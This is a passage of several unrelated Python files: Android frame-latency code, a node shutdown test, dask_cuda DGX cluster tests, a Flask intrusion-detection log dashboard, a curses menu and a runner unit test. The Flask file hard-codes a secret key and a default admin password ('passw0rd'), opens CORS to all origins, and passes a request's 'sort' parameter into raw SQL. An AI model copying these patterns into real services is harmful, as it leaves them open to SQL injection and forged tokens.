'dumpsys SurfaceFlinger --latency %s/%s' %
(self._window_package, self._window_activity), log_result=True)
if not len(results):
return (None, None)
refresh_period = int(results[0])
last_timestamp = previous_timestamp
first_timestamp = 0
for line in results[1:]:
fields = line.split()
if len(fields) == 3:
timestamp = long(fields[0])
last_timestamp = long(fields[2])
if (timestamp > previous_timestamp):
if not first_timestamp:
first_timestamp = timestamp
# This is integral equivalent of ceil((C-A) / refresh-period)
latency_ns = int(last_timestamp - timestamp)
latencies.append((latency_ns + refresh_period - 1) / refresh_period)
return (first_timestamp, last_timestamp)
def _GetSurfaceStatsLegacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
results = self._adb.RunShellCommand('service call SurfaceFlinger 1013')
assert len(results) == 1
match = re.search('^Result: Parcel\((\w+)', results[0])
cur_surface = 0
if match:
try:
cur_surface = int(match.group(1), 16)
except Exception:
logging.error('Failed to parse current surface from ' + match.group(1))
else:
logging.warning('Failed to call SurfaceFlinger surface ' + results[0])
return {
'page_flip_count': cur_surface,
'timestamp': datetime.datetime.now(),
}
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The worldwideweb Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test worldwidewebd shutdown."""
from test_framework.test_framework import worldwidewebTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(worldwidewebTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
test_dgx.py | import multiprocessing as mp
import os
import subprocess
from enum import Enum, auto
from time import sleep
import numpy
import pytest
from tornado.ioloop import IOLoop
from dask import array as da
from distributed import Client
from distributed.utils import get_ip_interface
from dask_cuda import LocalCUDACluster
from dask_cuda.initialize import initialize
from dask_cuda.utils import wait_workers
mp = mp.get_context("spawn")
psutil = pytest.importorskip("psutil")
class DGXVersion(Enum):
DGX_1 = auto()
DGX_2 = auto()
DGX_A100 = auto()
def _get_dgx_name():
product_name_file = "/sys/class/dmi/id/product_name"
dgx_release_file = "/etc/dgx-release"
# We verify `product_name_file` to check it's a DGX, and check
# if `dgx_release_file` exists to confirm it's not a container.
if not os.path.isfile(product_name_file) or not os.path.isfile(dgx_release_file):
return None
for line in open(product_name_file):
return line
def _get_dgx_version():
dgx_name = _get_dgx_name()
if dgx_name is None:
return None
elif "DGX-1" in dgx_name:
return DGXVersion.DGX_1
elif "DGX-2" in dgx_name:
return DGXVersion.DGX_2
elif "DGXA100" in dgx_name:
return DGXVersion.DGX_A100
def _get_dgx_net_devices():
if _get_dgx_version() == DGXVersion.DGX_1:
return [
"mlx5_0:1,ib0",
"mlx5_0:1,ib0",
"mlx5_1:1,ib1",
"mlx5_1:1,ib1",
"mlx5_2:1,ib2",
"mlx5_2:1,ib2",
"mlx5_3:1,ib3",
"mlx5_3:1,ib3",
]
elif _get_dgx_version() == DGXVersion.DGX_2:
return [
"mlx5_0:1,ib0",
"mlx5_0:1,ib0",
"mlx5_1:1,ib1",
"mlx5_1:1,ib1",
"mlx5_2:1,ib2",
"mlx5_2:1,ib2",
"mlx5_3:1,ib3",
"mlx5_3:1,ib3",
"mlx5_6:1,ib4",
"mlx5_6:1,ib4",
"mlx5_7:1,ib5",
"mlx5_7:1,ib5",
"mlx5_8:1,ib6",
"mlx5_8:1,ib6",
"mlx5_9:1,ib7",
"mlx5_9:1,ib7",
]
else:
return None
if _get_dgx_version() is None:
pytest.skip("Not a DGX server", allow_module_level=True)
# Notice, all of the following tests is executed in a new process such
# that UCX options of the different tests doesn't conflict.
# Furthermore, all tests do some computation to trigger initialization
# of UCX before retrieving the current config.
def _test_default():
with LocalCUDACluster() as cluster:
with Client(cluster):
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def test_default():
p = mp.Process(target=_test_default)
p.start()
p.join()
assert not p.exitcode
def _test_tcp_over_ucx():
ucp = pytest.importorskip("ucp")
with LocalCUDACluster(enable_tcp_over_ucx=True) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
return True
assert all(client.run(check_ucx_options).values())
def test_tcp_over_ucx():
ucp = pytest.importorskip("ucp") # NOQA: F841
p = mp.Process(target=_test_tcp_over_ucx)
p.start()
p.join()
assert not p.exitcode
def _test_tcp_only():
with LocalCUDACluster(protocol="tcp") as cluster:
with Client(cluster):
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def test_tcp_only():
p = mp.Process(target=_test_tcp_only)
p.start()
p.join()
assert not p.exitcode
def _test_ucx_infiniband_nvlink(enable_infiniband, enable_nvlink, enable_rdmacm):
cupy = pytest.importorskip("cupy")
ucp = pytest.importorskip("ucp")
net_devices = _get_dgx_net_devices()
openfabrics_devices = [d.split(",")[0] for d in net_devices]
ucx_net_devices = "auto" if enable_infiniband else None
cm_protocol = "rdmacm" if enable_rdmacm else "sockcm"
initialize(
enable_tcp_over_ucx=True,
enable_infiniband=enable_infiniband,
enable_nvlink=enable_nvlink,
enable_rdmacm=enable_rdmacm,
)
with LocalCUDACluster(
interface="ib0",
enable_tcp_over_ucx=True,
enable_infiniband=enable_infiniband,
enable_nvlink=enable_nvlink,
enable_rdmacm=enable_rdmacm,
ucx_net_devices=ucx_net_devices,
) as cluster:
with Client(cluster) as client:
res = da.from_array(cupy.arange(10000), chunks=(1000,), asarray=False)
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert cm_protocol in conf["TLS"]
assert cm_protocol in conf["SOCKADDR_TLS_PRIORITY"]
if enable_nvlink:
assert "cuda_ipc" in conf["TLS"]
if enable_infiniband:
assert "rc" in conf["TLS"]
return True
if enable_infiniband:
assert all(
[
cluster.worker_spec[k]["options"]["env"]["UCX_NET_DEVICES"]
== openfabrics_devices[k].split(",")[0]
for k in cluster.worker_spec.keys()
]
)
assert all(client.run(check_ucx_options).values())
@pytest.mark.parametrize(
"params",
[
{"enable_infiniband": False, "enable_nvlink": False, "enable_rdmacm": False},
{"enable_infiniband": True, "enable_nvlink": True, "enable_rdmacm": False},
{"enable_infiniband": True, "enable_nvlink": False, "enable_rdmacm": True},
{"enable_infiniband": True, "enable_nvlink": True, "enable_rdmacm": True},
],
)
@pytest.mark.skipif(
_get_dgx_version() == DGXVersion.DGX_A100,
reason="Automatic InfiniBand device detection Unsupported for %s" % _get_dgx_name(),
)
def test_ucx_infiniband_nvlink(params):
ucp = pytest.importorskip("ucp") # NOQA: F841
p = mp.Process(
target=_test_ucx_infiniband_nvlink,
args=(
params["enable_infiniband"],
params["enable_nvlink"],
params["enable_rdmacm"],
),
)
p.start()
p.join()
assert not p.exitcode
def _test_dask_cuda_worker_ucx_net_devices(enable_rdmacm):
loop = IOLoop.current()
ucp = pytest.importorskip("ucp")
cm_protocol = "rdmacm" if enable_rdmacm else "sockcm"
net_devices = _get_dgx_net_devices()
openfabrics_devices = [d.split(",")[0] for d in net_devices]
sched_addr = "127.0.0.1"
# Enable proper variables for scheduler
sched_env = os.environ.copy()
sched_env["DASK_UCX__INFINIBAND"] = "True"
sched_env["DASK_UCX__TCP"] = "True"
sched_env["DASK_UCX__CUDA_COPY"] = "True"
sched_env["DASK_UCX__NET_DEVICES"] = openfabrics_devices[0]
if enable_rdmacm:
sched_env["DASK_UCX__RDMACM"] = "True"
sched_addr = get_ip_interface("ib0")
sched_url = "ucx://" + sched_addr + ":9379"
# Enable proper variables for workers
worker_ucx_opts = [
"--enable-infiniband",
"--net-devices",
"auto",
]
if enable_rdmacm:
worker_ucx_opts.append("--enable-rdmacm")
# Enable proper variables for client
initialize(
enable_tcp_over_ucx=True,
enable_infiniband=True,
enable_rdmacm=enable_rdmacm,
net_devices=openfabrics_devices[0],
)
with subprocess.Popen(
[
"dask-scheduler",
"--protocol",
"ucx",
"--host",
sched_addr,
"--port",
"9379",
"--no-dashboard",
],
env=sched_env,
) as sched_proc:
# Scheduler with UCX will take a few seconds to fully start
sleep(5)
with subprocess.Popen(
["dask-cuda-worker", sched_url, "--no-dashboard",] + worker_ucx_opts
) as worker_proc:
with Client(sched_url, loop=loop) as client:
def _timeout_callback():
# We must ensure processes are terminated to avoid hangs
# if a timeout occurs
worker_proc.kill()
sched_proc.kill()
assert wait_workers(client, timeout_callback=_timeout_callback)
workers_tls = client.run(lambda: ucp.get_config()["TLS"])
workers_tls_priority = client.run(
lambda: ucp.get_config()["SOCKADDR_TLS_PRIORITY"]
)
for tls, tls_priority in zip(
workers_tls.values(), workers_tls_priority.values()
):
assert cm_protocol in tls
assert cm_protocol in tls_priority
worker_net_devices = client.run(lambda: ucp.get_config()["NET_DEVICES"])
cuda_visible_devices = client.run(
lambda: os.environ["CUDA_VISIBLE_DEVICES"]
)
for i, v in enumerate(
zip(worker_net_devices.values(), cuda_visible_devices.values())
):
net_dev = v[0]
dev_idx = int(v[1].split(",")[0])
assert net_dev == openfabrics_devices[dev_idx]
# A dask-worker with UCX protocol will not close until some work
# is dispatched, therefore we kill the worker and scheduler to
# ensure timely closing.
worker_proc.kill()
sched_proc.kill()
@pytest.mark.parametrize("enable_rdmacm", [False, True])
@pytest.mark.skipif(
_get_dgx_version() == DGXVersion.DGX_A100,
reason="Automatic InfiniBand device detection Unsupported for %s" % _get_dgx_name(),
)
def test_dask_cuda_worker_ucx_net_devices(enable_rdmacm):
ucp = pytest.importorskip("ucp") # NOQA: F841
p = mp.Process(
target=_test_dask_cuda_worker_ucx_net_devices, args=(enable_rdmacm,),
)
p.start()
p.join()
assert not p.exitcode
|
manage1.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import rules
import os
import re
import requests
import json
import jsonpath
import time
from functools import reduce
from defender import Defender
from flask import Flask, g, jsonify, make_response, request
from flask_cors import CORS
from flask_httpauth import HTTPBasicAuth
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import text
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from itsdangerous import BadSignature, SignatureExpired
from passlib.apps import custom_app_context
import socket
import random
import threading
import sys
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
# r'/*' 是通配符,让本服务器所有的 URL 都允许跨域请求
CORS(app, resources=r'/*')
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_RECORD_QUERIES'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(basedir, 'data.sqlite')
db = SQLAlchemy(app)
auth = HTTPBasicAuth()
CSRF_ENABLED = True
app.debug = True
app.config['JSON_AS_ASCII'] = False
f = open("out.json")
global attack_log
attack_log = []
class hostInfos(db.Model):
'''
日志信息映射类
'''
__tablename__ = 'hostInfos'
id = db.Column(db.Integer, primary_key=True)
timestampNanos = db.Column(db.String(64))
pid = db.Column(db.Text(2000))
ppid = db.Column(db.Text(2000))
pname = db.Column(db.Text(2000))
absolute_file_path = db.Column(db.String(64))
cwd = db.Column(db.String(120))
cmdLine = db.Column(db.Text(2000))
hostName = db.Column(db.Text(2000))
hostip = db.Column(db.Text(2000))
userId = db.Column(db.Text(2000))
groupIds = db.Column(db.Text(2000))
# 获取主机信息
def to_dict(self):
columns = self.__table__.columns.keys()
result = {}
for key in columns:
value = getattr(self, key)
result[key] = value
return result
class Admin(db.Model):
'''
管理员表
'''
__tablename__ = 'admins'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(32), index=True)
password = db.Column(db.String(128))
# 密码加密
def hash_password(self, password):
self.password = custom_app_context.encrypt(password)
# 密码解析
def verify_password(self, password):
return custom_app_context.verify(password, self.password)
# 获取token,有效时间10min
def generate_auth_token(self, expiration=600):
s = Serializer(app.config['SECRET_KEY'], expires_in=expiration)
return s.dumps({'id': self.id})
# 解析token,确认登录的用户身份
@staticmethod
def verify_auth_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
data = s.loads(token)
except SignatureExpired:
return None # valid token, but expired
except BadSignature:
return None # invalid token
admin = Admin.query.get(data['id'])
return admin
class checkJSON(object):
'''
遍历json所有key
'''
def getKeys(self, data):
keysAll_list = []
def getkeys(data): # 遍历json所有key
if (type(data) == type({})):
keys = data.keys()
for key in keys:
value = data.get(key)
if (type(value) != type({}) and type(value) != type([])):
keysAll_list.append(key)
elif (type(value) == type({})):
keysAll_list.append(key)
getkeys(value)
elif (type(value) == type([])):
keysAll_list.append(key)
for para in value:
if (type(para) == type({}) or type(para) == type([])):
getkeys(para)
else:
keysAll_list.append(para)
getkeys(data)
return keysAll_list
def isExtend(self, data, tagkey): # 检测目标字段tagkey是否在data(json数据)中
if(type(data) != type({})):
print('please input a json!')
else:
key_list = self.getKeys(data)
for key in key_list:
if(key == tagkey):
return True
return False
def get_json_value(self, json_data, key_name):
'''获取到json中任意key的值,结果为list格式'''
key_value = jsonpath.jsonpath(
json_data, '$..{key_name}'.format(key_name=key_name))
# key的值不为空字符串或者为empty(用例中空固定写为empty)返回对应值,否则返回empty
return key_value
# 验证password
@auth.verify_password
def verify_password(name_or_token, password):
if not name_or_token:
return False
name_or_token = re.sub(r'^"|"$', '', name_or_token)
admin = Admin.verify_auth_token(name_or_token)
if not admin:
admin = Admin.query.filter_by(name=name_or_token).first()
if not admin or not admin.verify_password(password):
return False
g.admin = admin
print(g.admin.name)
return True
# 登录api
@app.route('/api/login', methods=['POST'])
@auth.login_required
def get_auth_token():
token = g.admin.generate_auth_token()
token = {
'token': token
}
return jsonify({'code': 20000, 'data': token, 'name': g.admin.name})
@app.route('/api/setpwd', methods=['POST'])
@auth.login_required
def set_auth_pwd():
data = json.loads(str(request.data, encoding="utf-8"))
admin = Admin.query.filter_by(name=g.admin.name).first()
if admin and admin.verify_password(data['oldpass']) and data['confirpass'] == data['newpass']:
admin.hash_password(data['newpass'])
return jsonify({'code': 200, 'msg': "密码修改成功"})
else:
return jsonify({'code': 500, 'msg': "请检查输入"})
# 获取数据
@app.route('/api/users/listpage', methods=['GET'])
@auth.login_required
def get_user_list():
page_size = request.args.get('limit', 20, type=int)
page = request.args.get('page', 1, type=int)
sort = request.args.get('sort', '')
pid = request.args.get('pid', '')
query = db.session.query
if pid:
Infos = query(hostInfos).filter(
hostInfos.pid.like('%{}%'.format(pid)))
else:
Infos = query(hostInfos)
if sort:
Infos = Infos.order_by(text(sort))
total = Infos.count()
if not page:
Infos = Infos.all()
else:
Infos = Infos.offset((page - 1) * page_size).limit(page_size).all()
return jsonify({
'code': 20000,
'total': total,
'page_size': page_size,
'infos': [u.to_dict() for u in Infos]
})
# 获取主机信息
@app.route('/api/hostInfo', methods=['GET'])
@auth.login_required
def get_hostInfo():
f1 = open("out.json")
hostinfo = get_host_info(f1.readlines())
f1.close()
return jsonify({
'code': 20000,
'infos': hostinfo
})
# 用户信息拉取api
@app.route('/api/userinfo', methods=['GET'])
@auth.login_required
def get_userInfo():
token = request.args.get('token', '')
print(token)
users = {
'admin': {
'roles': ['admin'],
'introduction': 'I am a super administrator',
'avatar': 'https://wpimg.wallstcn.com/f778738c-e4f8-4870-b634-56703b4acafe.gif',
'name': 'Super Admin'
},
'editor': {
'roles': ['editor'],
'introduction': 'I am an editor',
'avatar': 'https://wpimg.wallstcn.com/f778738c-e4f8-4870-b634-56703b4acafe.gif',
'name': 'Normal Editor'
}
}
admin = Admin.verify_auth_token(token)
if admin:
if admin.name == 'admin':
infos = users['admin']
else:
infos = users['editor']
return jsonify({
'code': 20000,
'data': infos
})
else:
return jsonify({
'code': 50000,
'data': 'something wrong'
})
# @app.route('/api/login', methods=['POST'])
# def login():
# data = json.loads(request.get_data(as_text=True))
# token={
# 'token': 'admin-token'
# }
# return jsonify({'code': 20000,'data': token})
# 删除一条日志信息
@app.route('/api/delete_once', methods=['GET'])
@auth.login_required
def delete_once():
try:
delete_id = request.args.get('delete_id')
query = db.session.query
delete_info = query(hostInfos).filter(
hostInfos.id == int(delete_id)).first()
db.session.delete(delete_info)
db.session.commit()
return jsonify({
'code': 20000,
'info': "删除成功"
})
except Exception as e:
return jsonify({
'code': 50000,
'info': "删除失败"
})
# 简单的入侵检测结果
@app.route('/api/attack_log', methods=['GET'])
@auth.login_required
def get_attack_log():
try:
return jsonify({
'code': 20000,
'info': attack_log
})
except Exception as e:
return jsonify({
'code': 50000,
'info': "删除失败"
})
@auth.error_handler
def unauthorized():
return make_response(jsonify({'error': 'Unauthorized access'}), 401)
def get_host_info(lines): # 获取主机信息
t = json.loads(lines[0])
host_info = {}
host_info['hostName'] = t['datum']['hostName']
host_info['osDetails'] = t['datum']['osDetails']
host_info['hostType'] = t['datum']['hostType']
host_info['interfaces'] = t['datum']['interfaces']
host_info['serial number'] = t['datum']['hostIdentifiers'][0]['idValue']
ips = []
for i in t['datum']['interfaces']:
for ip in i['ipAddresses']:
if re.match(r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$", ip) and ip != '127.0.0.1':
ips.append(ip)
host_info['ips'] = ips
return host_info
def request_one():
headers={
'Accept-Language':'zh-CN,zh;q=0.9'
}
s = requests.get("http://127.0.0.1:5000/analyse")
# 添加管理员
def init_admin():
try:
admin = Admin(
name='admin', password='$6$rounds=656000$smq9js2whAy2hEJX$4ZClo/lwmoD.z7Ex/qRyJp7fI3tp6ZOEw/CbU2GuZGVx2RrqU9muN./Ri2c04ESWQv/xZcaq1pz5oXgbP2H2Z/') # 密码passw0rd
db.session.add(admin)
db.session.commit()
except Exception as e:
print("add fail")
def add_all(data):
try:
hostinfos = []
for i in data:
hostinfos.append(hostInfos(timestampNanos=i['timestampNanos'], pid=i['pid'], pname=i['pname'], ppid=i['ppid'],
absolute_file_path=str(i['absolute_file_path']), cwd=i['cwd'], cmdLine=i['cmdLine'], hostName=i['hostName'], hostip=i['hostip'], userId=i['userId'], groupIds=i['groupIds']))
db.session.add_all(hostinfos)
db.session.commit()
except Exception as e:
print("add fail")
def timeStamp(timeNum): # 输入毫秒级的时间,转出正常格式的时间
timeStamp = float(timeNum/1000)
timeArray = time.localtime(timeStamp)
otherStyleTime = time.strftime("%Y-%m-%d %H:%M:%S", timeArray)
return otherStyleTime
# print(otherStyleTime)
# 2019-08-14 10:40:06
def list_dict_duplicate_removal(data): # 去重 list
def run_function(x, y): return x if y in x else x + [y]
return reduce(run_function, [[], ] + data)
# def bytetoint(byte):
# return reduce(lambda x, y: (x << 8) + y, byte)
@app.route('/analyse', methods=['GET'])
def analyse():
num = 1
total_data = []
host_data = {}
total_log = []
# 创建socket
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 本地信息
address = ('192.168.1.106', 9091)
tcp_server_socket.bind(address)
tcp_server_socket.listen(128)
recv_subject_process = False
host = 0
f = open("out1.json","a+")
while True:
# 等待新的客户端连接
client_socket, clientAddr = tcp_server_socket.accept()
while True:
# 接收对方发送过来的数据
recv_data = client_socket.recv(2048) # 接收1024个字节
if recv_data:
f.write(recv_data.decode('gbk'))
f.flush()
j = recv_data.decode('gbk')
total_data.append(j.strip())
# sys.stdout.write(str(len(total_data))+"\n")
cjson = checkJSON()
t = json.loads(j)
if host == 0:
try:
host_data = get_host_info(total_data)
host = 1
except Exception as e:
host_data['hostName'] = '未知'
host_data['ips']=['未知']
else:
sys.exit("请重启SPADE")
if 'SUBJECT_PROCESS' in cjson.get_json_value(t, 'type'):
recv_subject_process = True
sys.stdout.write(j)
break
if recv_subject_process and cjson.isExtend(t, 'sequence'):
recv_subject_process = False
path = []
sys.stdout.write
lis = cjson.getKeys(t)
log_info = {
'timestampNanos': '',
'ppid': '',
'cmdLine': '',
'pid': '',
'pname': '',
'absolute_file_path': '',
'cwd': '',
'hostName': '',
'hostip': '',
'userId': '',
'groupIds': ''
}
if cjson.isExtend(t, 'predicateObjectPath') == True and t['datum']['predicateObjectPath']:
path.append(t['datum']['predicateObjectPath'])
elif log_info['timestampNanos'] == 0:
if cjson.isExtend(t, 'timestampNanos') == True:
log_info['timestampNanos'] = timeStamp(
cjson.get_json_value(t, 'timestampNanos')[0]/1000000)
is_subject_process= False
for u in total_data[-(len(total_data)-total_data.index(j.strip()))-1::-1]:
u = json.loads(u)
if cjson.isExtend(u, 'sequence'):
if log_info['timestampNanos'] == 0:
log_info['timestampNanos'] = timeStamp(
u['datum']['timestampNanos']/1000000)
# path.append(n['datum']['predicateObjectPath'])
if cjson.isExtend(u, 'predicateObjectPath') == True:
if u['datum']['predicateObjectPath']:
path.append(
u['datum']['predicateObjectPath'])
break
if cjson.isExtend(u, 'baseObject') == True and is_subject_process == False:
if cjson.isExtend(u, 'path') == True and u['datum']['baseObject']['properties']['path']:
path.append(u['datum']['baseObject']['properties']['path'])
if 'SUBJECT_PROCESS' in cjson.get_json_value(u, 'type'):
is_subject_process = True
log_info['timestampNanos'] = timeStamp(
u['datum']['startTimestampNanos']/1000000) if u['datum']['startTimestampNanos'] != 0 else 0
log_info['cmdLine'] = u['datum']['cmdLine'] or ''
log_info['pname'] = u['datum']['properties']['name']
log_info['pid'] = u['datum']['cid']
log_info['ppid'] = u['datum']['properties']['ppid'] or ''
if 'cwd' in lis:
log_info['cwd'] = u['datum']['properties']['cwd']
else:
log_info['cwd'] = ''
log_info['hostName'] = host_data['hostName']
log_info['hostip'] = host_data['ips'][0]
if 'PRINCIPAL_LOCAL' in cjson.get_json_value(u, 'type'):
log_info['userId'] = cjson.get_json_value(u, 'userId')[
0]
log_info['groupIds'] = str(
cjson.get_json_value(u, 'groupIds')[0])
# elif cjson.isExtend(n, 'baseObject') == True and cjson.isExtend(n, 'pid'):
# log_info['pid'] = n['datum']['baseObject']['properties']['pid']
# break
# if cjson.get_json_value(n,'PRINCIPAL_LOCAL') is not None:
# print(n)
log_info['absolute_file_path'] = list(set(path))
total_log.append(log_info)
total_log = list_dict_duplicate_removal(total_log)
for i in total_log:
attack_info = {
'pid': '',
'ppid': '',
'pname': '',
'hostip': '',
'type_name': '',
'type_info': '',
'cmdLine': ''
}
cmdLine = i.get('cmdLine')
if cmdLine:
hostip = i.get('hostip')
pid = i.get('pid')
ppid = i.get('ppid')
pname = i.get('pname')
defender = Defender(cmdLine)
get_rule = defender.run()
if get_rule:
type_name = get_rule.get('type')
type_info = get_rule.get('type_info')
attack_info['cmdLine'] = cmdLine
attack_info['pid'] = pid
attack_info['ppid'] = ppid
attack_info['pname'] = pname
attack_info['hostip'] = hostip
attack_info['type_name'] = type_name
attack_info['type_info'] = type_info
attack_log.append(attack_info)
add_all(total_log)
else:
break
client_socket.close()
tcp_server_socket.close()
return "hello"
if __name__ == '__main__':
db.drop_all()
db.create_all()
init_admin()
t = threading.Thread(target=request_one)
t.start()
app.run(host='0.0.0.0', debug=False, threaded=True)
t.join()
|
menu.py | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import curses
import npyscreen
import time
from threading import Thread
from vent.api.actions import Action
from vent.api.plugins import Plugin
from vent.helpers.meta import Version
from vent.helpers.paths import PathDirs
from vent.menus.help import HelpForm
from vent.menus.main import MainForm
from vent.menus.tutorial_forms import TutorialAddingFilesForm
from vent.menus.tutorial_forms import TutorialAddingPluginsForm
from vent.menus.tutorial_forms import TutorialBackgroundForm
from vent.menus.tutorial_forms import TutorialBuildingCoresForm
from vent.menus.tutorial_forms import TutorialGettingSetupForm
from vent.menus.tutorial_forms import TutorialIntroForm
from vent.menus.tutorial_forms import TutorialStartingCoresForm
from vent.menus.tutorial_forms import TutorialTerminologyForm
from vent.menus.tutorial_forms import TutorialTroubleshootingForm
class VentApp(npyscreen.NPSAppManaged):
""" Main menu app for vent CLI """
keypress_timeout_default = 10
repo_value = {}
paths = PathDirs()
first_time = paths.ensure_file(paths.init_file)
if first_time[0] and first_time[1] != "exists":
npyscreen.NPSAppManaged.STARTING_FORM = "TUTORIALINTRO"
else:
npyscreen.NPSAppManaged.STARTING_FORM = "MAIN"
def onStart(self):
""" Override onStart method for npyscreen """
curses.mousemask(0)
self.paths.host_config()
version = Version()
# setup initial runtime stuff
if self.first_time[0] and self.first_time[1] != "exists":
plugins = Plugin()
actions = Action()
thr = Thread(target=MainForm.t_status, args=(), kwargs={'core': True})
thr.start()
while thr.is_alive():
npyscreen.notify_wait("Please wait while Vent initializes...1/4",
title="Setting up things...")
time.sleep(1)
thr.join()
thr = Thread(target=MainForm.t_status, args=(), kwargs={'core': False})
thr.start()
while thr.is_alive():
npyscreen.notify_wait("Please wait while Vent initializes...2/4",
title="Setting up things...")
time.sleep(1)
thr.join()
thr = Thread(target=plugins.auto_install, args=(), kwargs={})
thr.start()
while thr.is_alive():
npyscreen.notify_wait("Please wait while Vent initializes...3/4",
title="Setting up things...")
time.sleep(1)
thr.join()
thr = Thread(target=actions.startup, args=(), kwargs={})
thr.start()
while thr.is_alive():
npyscreen.notify_wait("Please wait while Vent initializes...4/4",
title="Setting up things...")
time.sleep(1)
thr.join()
quit_s = "\t"*4 + "^Q to quit"
tab_esc = "\t"*4 + "TAB to close menu popup"
self.addForm("MAIN",
MainForm,
name="Vent " + version +
"\t\t\t\t\t^T for help" + quit_s + tab_esc,
color="IMPORTANT")
self.addForm("HELP",
HelpForm,
name="Help\t\t\t\t\t\t\t\t^T to toggle previous" +
quit_s,
color="DANGER")
self.addForm("TUTORIALINTRO",
TutorialIntroForm,
name="Vent Tutorial" + quit_s,
color="DANGER")
self.addForm("TUTORIALBACKGROUND",
TutorialBackgroundForm,
name="About Vent" + quit_s,
color="DANGER")
self.addForm("TUTORIALTERMINOLOGY",
TutorialTerminologyForm,
name="About Vent" + quit_s,
color="DANGER")
self.addForm("TUTORIALGETTINGSETUP",
TutorialGettingSetupForm,
name="About Vent" + quit_s,
color="DANGER")
self.addForm("TUTORIALBUILDINGCORES",
TutorialBuildingCoresForm,
name="Working with Cores" + quit_s,
color="DANGER")
self.addForm("TUTORIALSTARTINGCORES",
TutorialStartingCoresForm,
name="Working with Cores" + quit_s,
color="DANGER")
self.addForm("TUTORIALADDINGPLUGINS",
TutorialAddingPluginsForm,
name="Working with Plugins" + quit_s,
color="DANGER")
self.addForm("TUTORIALADDINGFILES",
TutorialAddingFilesForm,
name="Files" + quit_s,
color="DANGER")
self.addForm("TUTORIALTROUBLESHOOTING",
TutorialTroubleshootingForm,
name="Troubleshooting" + quit_s,
color="DANGER")
def change_form(self, name):
""" Changes the form (window) that is displayed """
self.switchForm(name)
|
test_generator_runner.py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from typing import Dict
import threading
from queue import Queue
from towhee.engine.operator_runner.runner_base import RunnerStatus
from towhee.engine.operator_runner.generator_runner import GeneratorRunner
from tests.unittests.mock_operators.generator_operator import generator_operator
DATA_QUEUE = Queue()
class StopFrame:
pass
class MockReader:
def __init__(self, queue: Queue):
self._queue = queue
def read(self):
data = self._queue.get()
if not isinstance(data, StopFrame):
return data
else:
raise StopIteration()
class MockWriter:
def __init__(self):
self.res = []
def write(self, data: Dict):
self.res.append(data)
def run(runner):
runner.process()
class TestGeneratorRunner(unittest.TestCase):
"""
GeneratorRunner test
"""
def test_map_runner(self):
data_queue = Queue()
writer = MockWriter()
runner = GeneratorRunner('test', 0, 'generator_operator',
'mock_operators', {},
[MockReader(data_queue)], writer)
runner.set_op(generator_operator.GeneratorOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
self.assertEqual(runner.status, RunnerStatus.RUNNING)
data_queue.put({'num': 10})
data_queue.put(None)
t.join()
res = 0
for item in writer.res:
self.assertEqual(item[0], res)
res += 1
self.assertEqual(len(writer.res), 10)
self.assertEqual(runner.status, RunnerStatus.IDLE)
t = threading.Thread(target=run, args=(runner, ))
t.start()
self.assertEqual(runner.status, RunnerStatus.RUNNING)
data_queue.put({'num': 4})
data_queue.put({'num': 5})
data_queue.put(StopFrame())
runner.join()
self.assertEqual(len(writer.res), 19)
self.assertEqual(runner.status, RunnerStatus.FINISHED)
def test_generator_runner_with_error(self):
data_queue = Queue()
writer = MockWriter()
runner = GeneratorRunner('test', 0, 'generator_operator',
